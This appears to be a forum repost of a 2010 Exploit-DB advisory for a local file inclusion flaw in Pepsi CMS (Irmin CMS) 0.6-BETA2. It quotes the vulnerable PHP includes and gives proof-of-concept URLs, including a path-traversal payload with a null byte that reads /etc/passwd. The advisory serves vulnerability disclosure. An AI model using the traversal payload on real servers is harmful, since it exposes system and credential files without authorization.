Exploit Pepsi CMS (Irmin cms) pepsi-0.6-BETA2 - Multiple Local File

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
11938
Проверка EDB
  1. Пройдено
Автор
EIDELWEISS
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2010-1309 cve-2008-7254
Дата публикации
2010-03-30
Код:
########################################################
	Pepsi CMS (Irmin cms) pepsi-0.6-BETA2 Multiple Local File Vulnerability
########################################################

	fucking the Web Apps [LFI #1 - attack edition 

 ____                  __                              __    __                
/\  _`\               /\ \      __                    /\ \__/\ \               
\ \ \L\_\__  __    ___\ \ \/'\ /\_\    ___      __    \ \ ,_\ \ \___      __   
 \ \  _\/\ \/\ \  /'___\ \ , < \/\ \ /' _ `\  /'_ `\   \ \ \/\ \  _ `\  /'__`\ 
  \ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \   \ \ \_\ \ \ \ \/\  __/ 
   \ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \   \ \__\\ \_\ \_\ \____\
    \/_/  \/___/  \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \   \/__/ \/_/\/_/\/____/
                                                /\____/                        
                                                \_/__/                         
 __      __          __          ______                       Hack0wn! Security Project     
/\ \  __/\ \        /\ \        /\  _  \                           
\ \ \/\ \ \ \     __\ \ \____   \ \ \L\ \  _____   _____     ____  
 \ \ \ \ \ \ \  /'__`\ \ '__`\   \ \  __ \/\ '__`\/\ '__`\  /',__\ 
  \ \ \_/ \_\ \/\  __/\ \ \L\ \   \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\
   \ `\___x___/\ \____\\ \_,__/    \ \_\ \_\ \ ,__/\ \ ,__/\/\____/
    '\/__//__/  \/____/ \/___/      \/_/\/_/\ \ \/  \ \ \/  \/___/ 
                                             \ \_\   \ \_\         
                                              \/_/    \/_/         
                                                        

[+]Software:	Pepsi CMS (Irmin CMS)
[+]Version:	pepsi-0.6-BETA2
[+]License:	GNU/GPL
[+]Source:	http://sourceforge.net/projects/pepsicms/files/
[+]Risk:		High
[+]CWE:		CWE-22
[+]Local:		Yes
[+]Remote:	No

########################################################

[!] Discovered :	eidelweiss
[!] Contact :	eidelweiss[at]cyberservices[dot]com
[!] Thank`s :	sp3x (securityreason) - r0073r & 0x1D (inj3ct0r) loneferret - Exploits - dookie2000ca (exploit-db)
[!] Special To :	JosS (hack0wn) - g1xx_achmed - [D]eal [C]yber - Syabilla_putri (i miss u so much to)

########################################################

-=[Description]=-

	IrminCMS is a CMS (Content Management System) extensible and secure written in php
	Pepsi CMS is become of IrminCMS.


-=[ Vuln c0de ]=-
###############
	{index.php}
###############

<?php
if(!file_exists(".lock")) {
	$f = fopen(".basepath", "w");
	fwrite($f, "<?php define('BASEPATH', '".$_SERVER['DOCUMENT_ROOT']."'); ?>");
	fclose($f);
	fclose(fopen(".lock", "w"));
}

include (".basepath");
include ("config.php");

//very sweet
include "includes/template-loader.php";



###############
	{includes/template-loader.php}
###############

	include( 'config.php' );
	include( 'db.php' );
	//include( 'classes/theme_engine/engine.php' );
	include( $_Root_Path . 'classes/Smarty.class.php' );

########################################################

-=[ P0C ]=-

	Http://127.0.0.1/PATH/index.php?w=[LFI%]

	Http://127.0.0.1/PATH/includes/template-loader.php?_Root_Path=../../../../../../../../../etc/passwd%00

	
########################################################

Similar reference informed by Packetstorm Security:
http://packetstormsecurity.org/0808-exploits/pepsicms-rfi.txt
 
Источник
www.exploit-db.com